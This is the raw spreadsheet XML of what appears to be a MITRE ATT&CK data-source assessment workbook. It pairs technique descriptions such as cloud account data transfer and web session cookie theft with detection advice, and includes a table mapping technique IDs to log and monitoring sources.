A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) </t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>Cloud Service Dashboard</t>
  </si>
  <si>
    <t>Office 365 audit logs,Azure activity logs,Stackdriver logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Azure AD,Office 365</t>
  </si>
  <si>
    <t>Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</t>
  </si>
  <si>
    <t>An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,SaaS</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)
There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Mauraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>Sysmon:22</t>
  </si>
  <si>
    <t>30;25;30;15</t>
  </si>
  <si>
    <t>20;20;15;20;25</t>
  </si>
  <si>
    <t>25;30;25;20</t>
  </si>
  <si>
    <t>35;35;20;10</t>
  </si>
  <si>
    <t>10;15;15;15;15;15;15</t>
  </si>
  <si>
    <t>22;22;22;12;22</t>
  </si>
  <si>
    <t>30;30;10;30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</si>
</sst>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b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF333333"/>
      <name val="Verdana"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF006100"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF0C1B33"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF0C1B33"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="5">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6EFCE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.39994506668294322"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="3">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFA3A3A3"/>
      </left>
      <right style="medium">
        <color rgb="FFA3A3A3"/>
      </right>
      <top style="medium">
        <color rgb="FFA3A3A3"/>
      </top>
      <bottom style="medium">
        <color rgb="FFA3A3A3"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="4"/>
      </left>
      <right/>
      <top style="thin">
        <color theme="4"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="3">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="16">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="1" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" xfId="1" applyNumberFormat="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="2" xfId="2" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
  </cellXfs>
  <cellStyles count="3">
    <cellStyle name="Good" xfId="1" builtinId="26"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Rated" xfId="2" xr:uid="{9B432C2C-8FE4-3441-9D6A-8A9EF280CA5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afhartong/Desktop/ATTACKdatamap/mitre_data_assessment-de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ingLegend"/>
      <sheetName val="DataSourceEvents"/>
      <sheetName val="Detection"/>
      <sheetName val="DefenseMitigation"/>
      <sheetName val="TechniqueDataSourceWeights"/>
      <sheetName val="DefenseBypassWeights"/>
      <sheetName val="TechniqueApplication"/>
      <sheetName val="Knowledge base"/>
      <sheetName val="REF-DataSources"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"/>
      <sheetData sheetId="1"/>
      <sheetData sheetId="2"/>
      <sheetData sheetId="3"/>
      <sheetData sheetId="4"/>
      <sheetData sheetId="5"/>
      <sheetData sheetId="6"/>
      <sheetData sheetId="7"/>
      <sheetData sheetId="8">
        <row r="1">
          <cell r="A1" t="str">
            <v>ID</v>
          </cell>
          <cell r="B1" t="str">
            <v>Name</v>
          </cell>
          <cell r="C1" t="str">
            <v>Data Source</v>
          </cell>
        </row>
        <row r="2">
          <cell r="A2" t="str">
            <v>T1001</v>
          </cell>
          <cell r="B2" t="str">
            <v>Data Obfuscation</v>
          </cell>
          <cell r="C2" t="str">
            <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
          </cell>
        </row>
        <row r="3">
          <cell r="A3" t="str">
            <v>T1002</v>
          </cell>
          <cell r="B3" t="str">
            <v>Data Compressed</v>
          </cell>
          <cell r="C3" t="str">
            <v>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="4">
          <cell r="A4" t="str">
            <v>T1003</v>
          </cell>
          <cell r="B4" t="str">
            <v>Credential Dumping</v>
          </cell>
          <cell r="C4" t="str">
            <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
          </cell>
        </row>
        <row r="5">
          <cell r="A5" t="str">
            <v>T1004</v>
          </cell>
          <cell r="B5" t="str">
            <v>Winlogon Helper DLL</v>
          </cell>
          <cell r="C5" t="str">
            <v>Windows Registry,File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="6">
          <cell r="A6" t="str">
            <v>T1005</v>
          </cell>
          <cell r="B6" t="str">
            <v>Data from Local System</v>
          </cell>
          <cell r="C6" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="7">
          <cell r="A7" t="str">
            <v>T1006</v>
          </cell>
          <cell r="B7" t="str">
            <v>File System Logical Offsets</v>
          </cell>
          <cell r="C7" t="str">
            <v>API monitoring</v>
          </cell>
        </row>
        <row r="8">
          <cell r="A8" t="str">
            <v>T1007</v>
          </cell>
          <cell r="B8" t="str">
            <v>System Service Discovery</v>
          </cell>
          <cell r="C8" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="9">
          <cell r="A9" t="str">
            <v>T1008</v>
          </cell>
          <cell r="B9" t="str">
            <v>Fallback Channels</v>
          </cell>
          <cell r="C9" t="str">
            <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
          </cell>
        </row>
        <row r="10">
          <cell r="A10" t="str">
            <v>T1009</v>
          </cell>
          <cell r="B10" t="str">
            <v>Binary Padding</v>
          </cell>
          <cell r="C10" t="str">
            <v>Binary file metadata,File monitoring,Malware reverse engineering</v>
          </cell>
        </row>
        <row r="11">
          <cell r="A11" t="str">
            <v>T1010</v>
          </cell>
          <cell r="B11" t="str">
            <v>Application Window Discovery</v>
          </cell>
          <cell r="C11" t="str">
            <v>API monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="12">
          <cell r="A12" t="str">
            <v>T1011</v>
          </cell>
          <cell r="B12" t="str">
            <v>Exfiltration Over Other Network Medium</v>
          </cell>
          <cell r="C12" t="str">
            <v>User interface,Process monitoring</v>
          </cell>
        </row>
        <row r="13">
          <cell r="A13" t="str">
            <v>T1012</v>
          </cell>
          <cell r="B13" t="str">
            <v>Query Registry</v>
          </cell>
          <cell r="C13" t="str">
            <v>Windows Registry,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="14">
          <cell r="A14" t="str">
            <v>T1013</v>
          </cell>
          <cell r="B14" t="str">
            <v>Port Monitors</v>
          </cell>
          <cell r="C14" t="str">
            <v>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</v>
          </cell>
        </row>
        <row r="15">
          <cell r="A15" t="str">
            <v>T1014</v>
          </cell>
          <cell r="B15" t="str">
            <v>Rootkit</v>
          </cell>
          <cell r="C15" t="str">
            <v>BIOS,MBR,System calls</v>
          </cell>
        </row>
        <row r="16">
          <cell r="A16" t="str">
            <v>T1015</v>
          </cell>
          <cell r="B16" t="str">
            <v>Accessibility Features</v>
          </cell>
          <cell r="C16" t="str">
            <v>Windows Registry,File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="17">
          <cell r="A17" t="str">
            <v>T1016</v>
          </cell>
          <cell r="B17" t="str">
            <v>System Network Configuration Discovery</v>
          </cell>
          <cell r="C17" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="18">
          <cell r="A18" t="str">
            <v>T1017</v>
          </cell>
          <cell r="B18" t="str">
            <v>Application Deployment Software</v>
          </cell>
          <cell r="C18" t="str">
            <v>File monitoring,Process use of network,Process monitoring</v>
          </cell>
        </row>
        <row r="19">
          <cell r="A19" t="str">
            <v>T1018</v>
          </cell>
          <cell r="B19" t="str">
            <v>Remote System Discovery</v>
          </cell>
          <cell r="C19" t="str">
            <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
          </cell>
        </row>
        <row r="20">
          <cell r="A20" t="str">
            <v>T1019</v>
          </cell>
          <cell r="B20" t="str">
            <v>System Firmware</v>
          </cell>
          <cell r="C20" t="str">
            <v>API monitoring,BIOS,EFI</v>
          </cell>
        </row>
        <row r="21">
          <cell r="A21" t="str">
            <v>T1020</v>
          </cell>
          <cell r="B21" t="str">
            <v>Automated Exfiltration</v>
          </cell>
          <cell r="C21" t="str">
            <v>File monitoring,Process monitoring,Process use of network</v>
          </cell>
        </row>
        <row r="22">
          <cell r="A22" t="str">
            <v>T1021</v>
          </cell>
          <cell r="B22" t="str">
            <v>Remote Services</v>
          </cell>
          <cell r="C22" t="str">
            <v>Authentication logs</v>
          </cell>
        </row>
        <row r="23">
          <cell r="A23" t="str">
            <v>T1022</v>
          </cell>
          <cell r="B23" t="str">
            <v>Data Encrypted</v>
          </cell>
          <cell r="C23" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
          </cell>
        </row>
        <row r="24">
          <cell r="A24" t="str">
            <v>T1023</v>
          </cell>
          <cell r="B24" t="str">
            <v>Shortcut Modification</v>
          </cell>
          <cell r="C24" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="25">
          <cell r="A25" t="str">
            <v>T1024</v>
          </cell>
          <cell r="B25" t="str">
            <v>Custom Cryptographic Protocol</v>
          </cell>
          <cell r="C25" t="str">
            <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
          </cell>
        </row>
        <row r="26">
          <cell r="A26" t="str">
            <v>T1025</v>
          </cell>
          <cell r="B26" t="str">
            <v>Data from Removable Media</v>
          </cell>
          <cell r="C26" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="27">
          <cell r="A27" t="str">
            <v>T1026</v>
          </cell>
          <cell r="B27" t="str">
            <v>Multiband Communication</v>
          </cell>
          <cell r="C27" t="str">
            <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
          </cell>
        </row>
        <row r="28">
          <cell r="A28" t="str">
            <v>T1027</v>
          </cell>
          <cell r="B28" t="str">
            <v>Obfuscated Files or Information</v>
          </cell>
          <cell r="C28" t="str">
            <v>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</v>
          </cell>
        </row>
        <row r="29">
          <cell r="A29" t="str">
            <v>T1028</v>
          </cell>
          <cell r="B29" t="str">
            <v>Windows Remote Management</v>
          </cell>
          <cell r="C29" t="str">
            <v>File monitoring,Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="30">
          <cell r="A30" t="str">
            <v>T1029</v>
          </cell>
          <cell r="B30" t="str">
            <v>Scheduled Transfer</v>
          </cell>
          <cell r="C30" t="str">
            <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
          </cell>
        </row>
        <row r="31">
          <cell r="A31" t="str">
            <v>T1030</v>
          </cell>
          <cell r="B31" t="str">
            <v>Data Transfer Size Limits</v>
          </cell>
          <cell r="C31" t="str">
            <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
          </cell>
        </row>
        <row r="32">
          <cell r="A32" t="str">
            <v>T1031</v>
          </cell>
          <cell r="B32" t="str">
            <v>Modify Existing Service</v>
          </cell>
          <cell r="C32" t="str">
            <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="33">
          <cell r="A33" t="str">
            <v>T1032</v>
          </cell>
          <cell r="B33" t="str">
            <v>Standard Cryptographic Protocol</v>
          </cell>
          <cell r="C33" t="str">
            <v>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</v>
          </cell>
        </row>
        <row r="34">
          <cell r="A34" t="str">
            <v>T1033</v>
          </cell>
          <cell r="B34" t="str">
            <v>System Owner/User Discovery</v>
          </cell>
          <cell r="C34" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="35">
          <cell r="A35" t="str">
            <v>T1034</v>
          </cell>
          <cell r="B35" t="str">
            <v>Path Interception</v>
          </cell>
          <cell r="C35" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="36">
          <cell r="A36" t="str">
            <v>T1035</v>
          </cell>
          <cell r="B36" t="str">
            <v>Service Execution</v>
          </cell>
          <cell r="C36" t="str">
            <v>Windows Registry,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="37">
          <cell r="A37" t="str">
            <v>T1036</v>
          </cell>
          <cell r="B37" t="str">
            <v>Masquerading</v>
          </cell>
          <cell r="C37" t="str">
            <v>File monitoring,Process monitoring,Binary file metadata</v>
          </cell>
        </row>
        <row r="38">
          <cell r="A38" t="str">
            <v>T1037</v>
          </cell>
          <cell r="B38" t="str">
            <v>Logon Scripts</v>
          </cell>
          <cell r="C38" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="39">
          <cell r="A39" t="str">
            <v>T1038</v>
          </cell>
          <cell r="B39" t="str">
            <v>DLL Search Order Hijacking</v>
          </cell>
          <cell r="C39" t="str">
            <v>File monitoring,DLL monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="40">
          <cell r="A40" t="str">
            <v>T1039</v>
          </cell>
          <cell r="B40" t="str">
            <v>Data from Network Shared Drive</v>
          </cell>
          <cell r="C40" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="41">
          <cell r="A41" t="str">
            <v>T1040</v>
          </cell>
          <cell r="B41" t="str">
            <v>Network Sniffing</v>
          </cell>
          <cell r="C41" t="str">
            <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
          </cell>
        </row>
        <row r="42">
          <cell r="A42" t="str">
            <v>T1041</v>
          </cell>
          <cell r="B42" t="str">
            <v>Exfiltration Over Command and Control Channel</v>
          </cell>
          <cell r="C42" t="str">
            <v>User interface,Process monitoring</v>
          </cell>
        </row>
        <row r="43">
          <cell r="A43" t="str">
            <v>T1042</v>
          </cell>
          <cell r="B43" t="str">
            <v>Change Default File Association</v>
          </cell>
          <cell r="C43" t="str">
            <v>Windows Registry,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="44">
          <cell r="A44" t="str">
            <v>T1043</v>
          </cell>
          <cell r="B44" t="str">
            <v>Commonly Used Port</v>
          </cell>
          <cell r="C44" t="str">
            <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
          </cell>
        </row>
        <row r="45">
          <cell r="A45" t="str">
            <v>T1044</v>
          </cell>
          <cell r="B45" t="str">
            <v>File System Permissions Weakness</v>
          </cell>
          <cell r="C45" t="str">
            <v>File monitoring,Services,Process command-line parameters</v>
          </cell>
        </row>
        <row r="46">
          <cell r="A46" t="str">
            <v>T1045</v>
          </cell>
          <cell r="B46" t="str">
            <v>Software Packing</v>
          </cell>
          <cell r="C46" t="str">
            <v>Binary file metadata</v>
          </cell>
        </row>
        <row r="47">
          <cell r="A47" t="str">
            <v>T1046</v>
          </cell>
          <cell r="B47" t="str">
            <v>Network Service Scanning</v>
          </cell>
          <cell r="C47" t="str">
            <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
          </cell>
        </row>
        <row r="48">
          <cell r="A48" t="str">
            <v>T1047</v>
          </cell>
          <cell r="B48" t="str">
            <v>Windows Management Instrumentation</v>
          </cell>
          <cell r="C48" t="str">
            <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="49">
          <cell r="A49" t="str">
            <v>T1048</v>
          </cell>
          <cell r="B49" t="str">
            <v>Exfiltration Over Alternative Protocol</v>
          </cell>
          <cell r="C49" t="str">
            <v>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
          </cell>
        </row>
        <row r="50">
          <cell r="A50" t="str">
            <v>T1049</v>
          </cell>
          <cell r="B50" t="str">
            <v>System Network Connections Discovery</v>
          </cell>
          <cell r="C50" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="51">
          <cell r="A51" t="str">
            <v>T1050</v>
          </cell>
          <cell r="B51" t="str">
            <v>New Service</v>
          </cell>
          <cell r="C51" t="str">
            <v>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</v>
          </cell>
        </row>
        <row r="52">
          <cell r="A52" t="str">
            <v>T1051</v>
          </cell>
          <cell r="B52" t="str">
            <v>Shared Webroot</v>
          </cell>
          <cell r="C52" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="53">
          <cell r="A53" t="str">
            <v>T1052</v>
          </cell>
          <cell r="B53" t="str">
            <v>Exfiltration Over Physical Medium</v>
          </cell>
          <cell r="C53" t="str">
            <v>Data loss prevention,File monitoring</v>
          </cell>
        </row>
        <row r="54">
          <cell r="A54" t="str">
            <v>T1053</v>
          </cell>
          <cell r="B54" t="str">
            <v>Scheduled Task</v>
          </cell>
          <cell r="C54" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
          </cell>
        </row>
        <row r="55">
          <cell r="A55" t="str">
            <v>T1054</v>
          </cell>
          <cell r="B55" t="str">
            <v>Indicator Blocking</v>
          </cell>
          <cell r="C55" t="str">
            <v>Sensor health and status,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="56">
          <cell r="A56" t="str">
            <v>T1055</v>
          </cell>
          <cell r="B56" t="str">
            <v>Process Injection</v>
          </cell>
          <cell r="C56" t="str">
            <v>API monitoring,Windows Registry,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
          </cell>
        </row>
        <row r="57">
          <cell r="A57" t="str">
            <v>T1056</v>
          </cell>
          <cell r="B57" t="str">
            <v>Input Capture</v>
          </cell>
          <cell r="C57" t="str">
            <v>Windows Registry,Kernel drivers,Process monitoring,API monitoring</v>
          </cell>
        </row>
        <row r="58">
          <cell r="A58" t="str">
            <v>T1057</v>
          </cell>
          <cell r="B58" t="str">
            <v>Process Discovery</v>
          </cell>
          <cell r="C58" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="59">
          <cell r="A59" t="str">
            <v>T1058</v>
          </cell>
          <cell r="B59" t="str">
            <v>Service Registry Permissions Weakness</v>
          </cell>
          <cell r="C59" t="str">
            <v>Process command-line parameters,Services,Windows Registry</v>
          </cell>
        </row>
        <row r="60">
          <cell r="A60" t="str">
            <v>T1059</v>
          </cell>
          <cell r="B60" t="str">
            <v>Command-Line Interface</v>
          </cell>
          <cell r="C60" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="61">
          <cell r="A61" t="str">
            <v>T1060</v>
          </cell>
          <cell r="B61" t="str">
            <v>Registry Run Keys / Startup Folder</v>
          </cell>
          <cell r="C61" t="str">
            <v>Windows Registry,File monitoring</v>
          </cell>
        </row>
        <row r="62">
          <cell r="A62" t="str">
            <v>T1061</v>
          </cell>
          <cell r="B62" t="str">
            <v>Graphical User Interface</v>
          </cell>
          <cell r="C62" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
          </cell>
        </row>
        <row r="63">
          <cell r="A63" t="str">
            <v>T1062</v>
          </cell>
          <cell r="B63" t="str">
            <v>Hypervisor</v>
          </cell>
          <cell r="C63" t="str">
            <v>System calls</v>
          </cell>
        </row>
        <row r="64">
          <cell r="A64" t="str">
            <v>T1063</v>
          </cell>
          <cell r="B64" t="str">
            <v>Security Software Discovery</v>
          </cell>
          <cell r="C64" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="65">
          <cell r="A65" t="str">
            <v>T1064</v>
          </cell>
          <cell r="B65" t="str">
            <v>Scripting</v>
          </cell>
          <cell r="C65" t="str">
            <v>Process monitoring,File monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="66">
          <cell r="A66" t="str">
            <v>T1065</v>
          </cell>
          <cell r="B66" t="str">
            <v>Uncommonly Used Port</v>
          </cell>
          <cell r="C66" t="str">
            <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
          </cell>
        </row>
        <row r="67">
          <cell r="A67" t="str">
            <v>T1066</v>
          </cell>
          <cell r="B67" t="str">
            <v>Indicator Removal from Tools</v>
          </cell>
          <cell r="C67" t="str">
            <v>Process use of network,Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
          </cell>
        </row>
        <row r="68">
          <cell r="A68" t="str">
            <v>T1067</v>
          </cell>
          <cell r="B68" t="str">
            <v>Bootkit</v>
          </cell>
          <cell r="C68" t="str">
            <v>API monitoring,MBR,VBR</v>
          </cell>
        </row>
        <row r="69">
          <cell r="A69" t="str">
            <v>T1068</v>
          </cell>
          <cell r="B69" t="str">
            <v>Exploitation for Privilege Escalation</v>
          </cell>
          <cell r="C69" t="str">
            <v>Windows Error Reporting,Process monitoring,Application logs</v>
          </cell>
        </row>
        <row r="70">
          <cell r="A70" t="str">
            <v>T1069</v>
          </cell>
          <cell r="B70" t="str">
            <v>Permission Groups Discovery</v>
          </cell>
          <cell r="C70" t="str">
            <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="71">
          <cell r="A71" t="str">
            <v>T1070</v>
          </cell>
          <cell r="B71" t="str">
            <v>Indicator Removal on Host</v>
          </cell>
          <cell r="C71" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
          </cell>
        </row>
        <row r="72">
          <cell r="A72" t="str">
            <v>T1071</v>
          </cell>
          <cell r="B72" t="str">
            <v>Standard Application Layer Protocol</v>
          </cell>
          <cell r="C72" t="str">
            <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
          </cell>
        </row>
        <row r="73">
          <cell r="A73" t="str">
            <v>T1072</v>
          </cell>
          <cell r="B73" t="str">
            <v>Third-party Software</v>
          </cell>
          <cell r="C73" t="str">
            <v>File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
          </cell>
        </row>
        <row r="74">
          <cell r="A74" t="str">
            <v>T1073</v>
          </cell>
          <cell r="B74" t="str">
            <v>DLL Side-Loading</v>
          </cell>
          <cell r="C74" t="str">
            <v>Process use of network,Process monitoring,Loaded DLLs</v>
          </cell>
        </row>
        <row r="75">
          <cell r="A75" t="str">
            <v>T1074</v>
          </cell>
          <cell r="B75" t="str">
            <v>Data Staged</v>
          </cell>
          <cell r="C75" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="76">
          <cell r="A76" t="str">
            <v>T1075</v>
          </cell>
          <cell r="B76" t="str">
            <v>Pass the Hash</v>
          </cell>
          <cell r="C76" t="str">
            <v>Authentication logs</v>
          </cell>
        </row>
        <row r="77">
          <cell r="A77" t="str">
            <v>T1076</v>
          </cell>
          <cell r="B77" t="str">
            <v>Remote Desktop Protocol</v>
          </cell>
          <cell r="C77" t="str">
            <v>Authentication logs,Netflow/Enclave netflow,Process monitoring</v>
          </cell>
        </row>
        <row r="78">
          <cell r="A78" t="str">
            <v>T1077</v>
          </cell>
          <cell r="B78" t="str">
            <v>Windows Admin Shares</v>
          </cell>
          <cell r="C78" t="str">
            <v>Process use of network,Authentication logs,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="79">
          <cell r="A79" t="str">
            <v>T1078</v>
          </cell>
          <cell r="B79" t="str">
            <v>Valid Accounts</v>
          </cell>
          <cell r="C79" t="str">
            <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
          </cell>
        </row>
        <row r="80">
          <cell r="A80" t="str">
            <v>T1079</v>
          </cell>
          <cell r="B80" t="str">
